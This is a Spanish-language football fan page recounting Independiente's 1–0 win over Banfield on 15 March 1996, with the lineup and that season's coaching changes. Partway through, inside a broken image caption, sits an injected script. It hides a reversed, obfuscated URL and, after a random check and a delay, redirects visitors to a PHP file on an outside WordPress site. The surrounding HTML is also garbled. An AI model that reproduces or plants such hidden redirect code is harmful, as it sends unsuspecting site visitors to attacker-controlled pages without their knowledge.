Conectate con nosotros

Efemérides

Efemérides del 15 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1996Independiente visita y le gana a Banfield por 0 a 1, con gol de Javier Mazzoni a los 54 minutos mediante un muy buen cabezazo. Se trató de la fecha 2 del Clausura 1996, siendo la primera victoria, porque en el debut fue caída como local frente a Ferro.

Aquella jornada el equipo fue: Faryd Mondragón; Néstor Clausen, Pablo Rotchen, José Serrizuela y Juan Ramírez; Diego Cagna, Roberto Acuña, Cristian Domizzi y Jorge Burruchaga (79’ Ángel Morales); Javier Mazzoni (77’ Carlos Bustos) y José Calderón (80’ Gabriel Álvez), con Gregorio Pérez como D.T.  El partido mostró al equipo con gran actitud ganadora, luego de lo que había sido un paupérrimo debut en la primera fecha. Los referentes del plantel, Clausen y Burruchaga, fueron los de mejores rendimientos, y la victoria fue justa.

Aun así, no sirvió en absoluto para darle arranque al equipo y competir por el título, ya que en las dos fechas siguientes se sucedieron derrotas frente a Lanús y Rosario Central. Independiente venía de terminar 1995 con el histórico Maracanazo al ganar la Supercopa, pero luego de eso el DT Miguel Ángel López dejó su cargo, y asumió Gregorio Pérez. El nuevo D.T. pidió a Calderón y le dieron el gusto, jugador que debutó en la primera fecha y tuvo su efeméride, pero el equipo perdió muchísima creación con las partidas de Gustavo López y Daniel Garnero.

No se prendió nunca en la lucha el título y en mayo, promediando el torneo, Gregorio Pérez deja su cargo dando paso a la llegada de Humberto Grondona, que tampoco obtuvo resultados y duró hasta finalizar la competencia (en agosto, cuando asume César Menotti). El Rojo terminó decimosegundo ese Clausura que tuvo como campeón a Vélez, y con los cinco equipos denominados grandes fuera de toda pelea. Boca fue quinto, Racing octavo, River decimocuarto y San Lorenzo decimonoveno. En ese aspecto quizá estuvo lo único para destacar en Independiente, porque no perdió ningún clásico, venciendo a River y San Lorenzo, y empatando con Boca y Racing.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»64″ height=»49″/></figure></div>



<p>Les dejo el <strong>video resumen del partido</strong>:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides